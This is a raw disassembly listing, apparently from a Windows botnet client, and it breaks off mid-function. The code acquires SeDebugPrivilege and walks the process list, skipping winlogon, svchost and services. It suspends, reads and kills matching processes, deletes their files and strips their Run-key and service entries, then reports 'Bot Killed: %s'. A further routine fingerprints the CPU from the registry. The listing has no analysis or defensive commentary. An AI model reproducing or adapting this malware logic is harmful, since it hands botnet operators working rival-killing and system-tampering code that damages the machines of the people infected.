sub_419948 proc near ; CODE XREF: sub_419EA0+483�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_42656C
test eax, eax
jnz short loc_41996A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419948+1C�j
; sub_419948+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41998E
push [ebp+var_14]
push 0
push 1F03FFh
call dword_426580
push eax
call ds:dword_41D0D4 ; ResumeThread
cmp eax, 0FFFFFFFFh
jz short loc_41999F
loc_41998E: ; CODE XREF: sub_419948+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_426590
test eax, eax
jnz short loc_41996A
loc_41999F: ; CODE XREF: sub_419948+44�j
push [ebp+arg_4]
call ds:dword_41D0DC ; CloseHandle
mov al, 1
leave
retn
sub_419948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199AC proc near ; CODE XREF: sub_419EA0+3BD�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_42656C
test eax, eax
jnz short loc_4199CE
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_4199AC+1C�j
; sub_4199AC+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_4199F2
push [ebp+var_14]
push 0
push 1F03FFh
call dword_426580
push eax
call ds:dword_41D0D8 ; SuspendThread
cmp eax, 0FFFFFFFFh
jz short loc_419A03
loc_4199F2: ; CODE XREF: sub_4199AC+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_426590
test eax, eax
jnz short loc_4199CE
loc_419A03: ; CODE XREF: sub_4199AC+44�j
push [ebp+arg_4]
call ds:dword_41D0DC ; CloseHandle
mov al, 1
leave
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A10 proc near ; CODE XREF: sub_419EA0+3D4�p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call dword_426574
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419A49
loc_419A39: ; CODE XREF: sub_419A10+53�j
xor al, al
loc_419A3B: ; CODE XREF: sub_419A10+8D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_419A10+27�j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call dword_426568
test eax, eax
jz short loc_419A39
loc_419A65: ; CODE XREF: sub_419A10+6B�j
inc ebx
cmp ebx, 1
jz short loc_419A81
lea eax, [ebp+var_228]
push eax
push edi
call dword_426584
test eax, eax
jnz short loc_419A65
xor bl, bl
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A81: ; CODE XREF: sub_419A10+59�j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_419A94: ; CODE XREF: sub_419A10+6F�j
push edi
call ds:dword_41D0DC ; CloseHandle
mov al, bl
jmp short loc_419A3B
sub_419A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_419A9F proc near ; CODE XREF: sub_419E55+2D�p
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh ; size_t
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx ; int
push eax ; void *
mov [ebp+1B4h+var_234], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call _memset
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4255DC
mov [ebp+1B4h+var_220], 2
loc_419B18: ; CODE XREF: sub_419A9F+160�j
mov [ebp+1B4h+var_208], ebx
loc_419B1B: ; CODE XREF: sub_419A9F+153�j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz loc_419BE2
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_419BCE
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_419A9F+13D�j
xor edi, edi
loc_419B5A: ; CODE XREF: sub_419A9F+10C�j
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_419B60: ; CODE XREF: sub_419A9F+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419B60
sub eax, edx
push eax ; size_t
push [ebp+1B4h+var_224] ; char *
lea eax, [ebp+edi+1B4h+var_204]
push eax ; char *
call __strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_419B99
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_416F32
add esp, 0Ch
loc_419B99: ; CODE XREF: sub_419A9F+DD�j
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_419BA0: ; CODE XREF: sub_419A9F+106�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419BA0
sub eax, edx
cmp edi, eax
jbe short loc_419B5A
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_419BCE: ; CODE XREF: sub_419A9F+B7�j
push [ebp+1B4h+var_210]
call ds:dword_41D020 ; RegEnumValueA
cmp eax, 103h
jnz loc_419B58
loc_419BE2: ; CODE XREF: sub_419A9F+98�j
push [ebp+1B4h+var_210]
call ds:dword_41D010 ; RegCloseKey
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_419B1B
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_419B18
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1B4h
leave
retn
sub_419A9F endp
; =============== S U B R O U T I N E =======================================
sub_419C1D proc near ; CODE XREF: sub_419C6D+189�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:dword_41D024 ; OpenSCManagerA
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:dword_41D044 ; OpenServiceA
mov edi, eax
mov ebx, edi
call sub_419760
push edi
call ds:dword_41D03C ; DeleteService
test eax, eax
jz short loc_419C69
mov bl, 1
loc_419C57: ; CODE XREF: sub_419C1D+4E�j
push esi
mov esi, ds:dword_41D040
call esi ; CloseServiceHandle
push edi
call esi ; CloseServiceHandle
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419C69: ; CODE XREF: sub_419C1D+36�j
xor bl, bl
jmp short loc_419C57
sub_419C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_419C6D proc near ; CODE XREF: sub_419E55+35�p
; sub_419E55:loc_419E92�p
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
Dest = byte ptr -234h
var_233 = byte ptr -233h
Str1 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi ; size_t
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi ; int
push eax ; void *
mov [ebp+2C0h+Dest], 0
call _memset
push esi ; size_t
lea eax, [ebp+2C0h+var_133]
push edi ; int
push eax ; void *
mov [ebp+2C0h+Str1], 0
call _memset
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz loc_419E35
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+Str1]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:dword_41D018 ; RegEnumKeyA
cmp eax, 103h
jz loc_419E34
jmp short loc_419D2A
; ---------------------------------------------------------------------------
loc_419D25: ; CODE XREF: sub_419C6D+1C1�j
mov esi, 0FFh
loc_419D2A: ; CODE XREF: sub_419C6D+B6�j
push ebx ; size_t
lea eax, [ebp+2C0h+var_334]
push edi ; int
push eax ; void *
call _memset
push ebx ; size_t
lea eax, [ebp+2C0h+Dest]
push edi ; int
push eax ; void *
call _memset
lea eax, [ebp+2C0h+Str1]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_10 ; "%s\\%s"
lea eax, [ebp+2C0h+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+2C0h+Dest]
add esp, 2Ch
lea esi, [eax+1]
loc_419D6F: ; CODE XREF: sub_419C6D+107�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419D6F
sub eax, esi
mov [ebp+eax+2C0h+Dest], cl
lea eax, [ebp+2C0h+Str1]
push offset aLdm ; "LDM"
push eax ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_419E12
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+Str1]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_419E10
push ebx ; size_t
lea eax, [ebp+2C0h+var_334]
push eax ; void *
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+Dest]
push eax ; int
push 1 ; char
call sub_416ECD
add esp, 14h
test al, al
jz short loc_419E10
xor esi, esi
loc_419DCB: ; CODE XREF: sub_419C6D+1A1�j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_419DD1: ; CODE XREF: sub_419C6D+169�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419DD1
sub eax, edx
push eax ; size_t
push [ebp+2C0h+var_340] ; char *
lea eax, [ebp+esi+2C0h+var_334]
push eax ; char *
call __strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_419DFC
lea eax, [ebp+2C0h+Str1]
push eax
call sub_419C1D
pop ecx
loc_419DFC: ; CODE XREF: sub_419C6D+180�j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_419E03: ; CODE XREF: sub_419C6D+19B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419E03
sub eax, edx
cmp esi, eax
jbe short loc_419DCB
loc_419E10: ; CODE XREF: sub_419C6D+13B�j
; sub_419C6D+15A�j
xor edi, edi
loc_419E12: ; CODE XREF: sub_419C6D+127�j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+Str1]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:dword_41D018 ; RegEnumKeyA
cmp eax, 103h
jnz loc_419D25
loc_419E34: ; CODE XREF: sub_419C6D+B0�j
pop ebx
loc_419E35: ; CODE XREF: sub_419C6D+8A�j
push [ebp+2C0h+var_33C]
call ds:dword_41D010 ; RegCloseKey
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2C0h
leave
retn
sub_419C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E55 proc near ; CODE XREF: sub_419EA0+42A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D0F8 ; TerminateProcess
test eax, eax
jz short loc_419E9C
push 7D0h
call ds:dword_41D0FC ; Sleep
push [ebp+arg_4]
call ds:dword_41D0D0 ; DeleteFileA
test eax, eax
push [ebp+arg_8]
jz short loc_419E92
call sub_419A9F
push [ebp+arg_8]
call sub_419C6D
pop ecx
jmp short loc_419E97
; ---------------------------------------------------------------------------
loc_419E92: ; CODE XREF: sub_419E55+2B�j
call sub_419C6D
loc_419E97: ; CODE XREF: sub_419E55+3B�j
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419E9C: ; CODE XREF: sub_419E55+10�j
xor al, al
pop ebp
retn
sub_419E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA0 proc near ; DATA XREF: .text:0041BF57�o
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
Args = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
Dest = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h ; size_t
lea eax, [esp+57Ch+var_317]
push ebx ; int
push eax ; void *
mov [esp+584h+var_318], bl
call _memset
add esp, 0Ch
mov [esp+578h+var_558], offset aWinlogon_exe ; "winlogon.exe"
mov [esp+578h+var_554], offset aSvchost_exe ; "svchost.exe"
mov [esp+578h+var_550], offset aServices_exe ; "services.exe"
call sub_402AE8 ; GetCurrentProcessId
mov edi, ds:dword_41D0E4
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi ; GetModuleHandleA
mov esi, ds:dword_41D0EC
push eax
call esi ; GetProcAddress
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov dword_426580, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_3 ; "kernel32.dll"
mov dword_42658C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov dword_426574, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov dword_426578, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov dword_42657C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov dword_426568, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov dword_426584, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov dword_42656C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dl_10 ; "kernel32.dll"
mov dword_426590, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov dword_426570, eax
call ds:dword_41D0E8 ; LoadLibraryA
push eax
call esi ; GetProcAddress
cmp dword_426580, ebx
mov dword_426588, eax
jz loc_41A36B
cmp dword_42658C, ebx
jz loc_41A36B
cmp dword_426574, ebx
jz loc_41A36B
cmp dword_426578, ebx
jz loc_41A36B
cmp dword_42657C, ebx
jz loc_41A36B
cmp dword_426568, ebx
jz loc_41A36B
cmp dword_426584, ebx
jz loc_41A36B
cmp dword_42656C, ebx
jz loc_41A36B
cmp dword_426590, ebx
jz loc_41A36B
cmp dword_426570, ebx
jz loc_41A36B
cmp eax, ebx
jz loc_41A36B
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A087: ; CODE XREF: sub_419EA0+238�j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_11 ; "%s\\%s"
lea eax, [esp+esi+584h+Dest]
push 103h ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+esi+58Ch+Dest]
add esp, 14h
lea ecx, [eax+1]
loc_41A0B9: ; CODE XREF: sub_419EA0+21E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A0B9
add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+Dest], bl
jb short loc_41A087
loc_41A0DA: ; CODE XREF: sub_419EA0+4C6�j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call dword_426574
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call dword_426578
test eax, eax
jz loc_41A35B
jmp loc_41A344
; ---------------------------------------------------------------------------
loc_41A108: ; CODE XREF: sub_419EA0+4B5�j
mov edi, ds:dword_41D104
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi ; GetCurrentThread
mov esi, ds:dword_41D038
push eax
call esi ; OpenThreadToken
test eax, eax
jnz short loc_41A15C
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 3F0h
jnz short loc_41A158
push 2
call ds:dword_41D030 ; ImpersonateSelf
test eax, eax
jnz short loc_41A147
mov [esp+578h+var_569], bl
loc_41A147: ; CODE XREF: sub_419EA0+2A1�j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi ; GetCurrentThread
push eax
call esi ; OpenThreadToken
test eax, eax
jnz short loc_41A15C
loc_41A158: ; CODE XREF: sub_419EA0+295�j
mov [esp+578h+var_569], bl
loc_41A15C: ; CODE XREF: sub_419EA0+288�j
; sub_419EA0+2B6�j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
add esp, 0Ch
test al, al
jnz short loc_41A181
push [esp+578h+var_564]
call ds:dword_41D0DC ; CloseHandle
mov [esp+578h+var_569], bl
loc_41A181: ; CODE XREF: sub_419EA0+2D1�j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call dword_42658C
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A19D
mov [esp+578h+var_569], bl
loc_41A19D: ; CODE XREF: sub_419EA0+2F7�j
mov esi, 104h
push esi ; size_t
lea eax, [esp+57Ch+Args]
push ebx ; int
push eax ; void *
call _memset
add esp, 0Ch
push esi
lea eax, [esp+57Ch+Args]
push eax
push ebx
push [esp+584h+var_568]
call dword_426588
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+Dest]
loc_41A1D3: ; CODE XREF: sub_419EA0+352�j
lea eax, [esp+578h+Args]
push eax ; Str2
push edi ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_41A1F6
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41A1D3
jmp short loc_41A1FA
; ---------------------------------------------------------------------------
loc_41A1F6: ; CODE XREF: sub_419EA0+345�j
mov [esp+578h+var_569], bl
loc_41A1FA: ; CODE XREF: sub_419EA0+354�j
cmp [esp+578h+var_569], bl
jz loc_41A32A
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41A32A
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jz loc_41A32A
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_426574
cmp eax, 0FFFFFFFFh
jz loc_41A32A
push eax
push esi
call sub_4199AC
cmp al, bl
pop ecx
pop ecx
jz loc_41A32A
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_419A10
test al, al
pop ecx
jz loc_41A30F
push [esp+578h+var_554] ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
cmp eax, ebx
pop ecx
jnz short loc_41A293
push ebx
jmp short loc_41A309
; ---------------------------------------------------------------------------
loc_41A293: ; CODE XREF: sub_419EA0+3EE�j
push eax ; Memory
push [esp+57Ch+var_554] ; int
push [esp+580h+var_558] ; int
push [esp+584h+var_568] ; int
call sub_4198D2
add esp, 10h
cmp al, bl
jz short loc_41A30F
push 100h ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+Args]
push eax
push [esp+580h+var_568]
call sub_419E55
add esp, 0Ch
test al, al
jz short loc_41A308
push esi ; void *
call __msize
pop ecx
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
lea eax, [esp+578h+Args]
push eax ; Args
push offset aBotKilledS ; "Bot Killed: %s"
push esi ; int
push 0 ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 14h
xor ebx, ebx
loc_41A308: ; CODE XREF: sub_419EA0+434�j
push esi ; Memory
loc_41A309: ; CODE XREF: sub_419EA0+3F1�j
call j_j__free
pop ecx
loc_41A30F: ; CODE XREF: sub_419EA0+3DC�j
; sub_419EA0+40A�j
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_426574
cmp eax, 0FFFFFFFFh
jz short loc_41A32A
push eax
push esi
call sub_419948
pop ecx
pop ecx
loc_41A32A: ; CODE XREF: sub_419EA0+35E�j
; sub_419EA0+386�j ...
push [esp+578h+var_564]
mov esi, ds:dword_41D0DC
call esi ; CloseHandle
push [esp+578h+var_568]
call esi ; CloseHandle
push 1
call ds:dword_41D0FC ; Sleep
loc_41A344: ; CODE XREF: sub_419EA0+263�j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call dword_42657C
test eax, eax
jnz loc_41A108
loc_41A35B: ; CODE XREF: sub_419EA0+25D�j
push 927C0h
call ds:dword_41D0FC ; Sleep
jmp loc_41A0DA
; ---------------------------------------------------------------------------
loc_41A36B: ; CODE XREF: sub_419EA0+14F�j
; sub_419EA0+15B�j ...
call ds:dword_41D0E0 ; GetCurrentThreadId
push eax
call sub_414042
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_419EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41A391 proc near ; CODE XREF: sub_401CC0+E0�p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
Dest = byte ptr -134h
var_133 = byte ptr -133h
var_34 = dword ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx ; size_t
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi ; int
push eax ; void *
call _memset
push 4 ; size_t
push offset dword_426BE8 ; void *
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax ; int
push 4 ; char
call sub_416ECD
add esp, 20h
test al, al
jz loc_41A5A9
push ebx ; size_t
lea eax, [ebp+2C4h+var_334]
push eax ; void *
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax ; int
push 1 ; char
call sub_416ECD
add esp, 14h
test al, al
jz loc_41A4E9
mov edi, 0FFh
push edi ; size_t
lea eax, [ebp+2C4h+var_133]
push esi ; int
push eax ; void *
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+Dest], 0
call _memset
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_15 ; "%s"
lea eax, [ebp+2C4h+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+2C4h+Dest]
add esp, 1Ch
lea esi, [eax+1]
loc_41A45C: ; CODE XREF: sub_41A391+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A45C
sub eax, esi
push ebx ; size_t
push 0 ; int
mov esi, offset Dest
push esi ; void *
mov [ebp+eax+2C4h+Dest], cl
call _memset
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41A482: ; CODE XREF: sub_41A391+154�j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41A499
cmp [ebp+ecx+2C4h+Dest], 20h
jz short loc_41A4C9
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A391+F5�j
movsx eax, [ebp+ecx+2C4h+Dest]
push eax
push esi
push offset aSC_1 ; "%s%c"
push edi ; Count
push esi ; Dest
call __snprintf
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41A4B7: ; CODE XREF: sub_41A391+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4B7
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov Dest[eax], dl
loc_41A4C9: ; CODE XREF: sub_41A391+FF�j
; sub_41A391+106�j
lea eax, [ebp+2C4h+Dest]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41A4D9: ; CODE XREF: sub_41A391+14D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4D9
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41A482
jmp short loc_41A51C
; ---------------------------------------------------------------------------
loc_41A4E9: ; CODE XREF: sub_41A391+85�j
push ebx ; size_t
push esi ; int
mov esi, offset Dest
push esi ; void *
call _memset
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 18h
lea eax, [esi+1]
loc_41A50D: ; CODE XREF: sub_41A391+181�j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A50D
sub esi, eax
mov Dest[esi], cl
loc_41A51C: ; CODE XREF: sub_41A391+156�j
and dword_426BEC, 0
mov [ebp+2C4h+var_33C], 1
loc_41A52A: ; CODE XREF: sub_41A391+20D�j
inc dword_426BEC
push ebx ; size_t
lea eax, [ebp+2C4h+var_234]
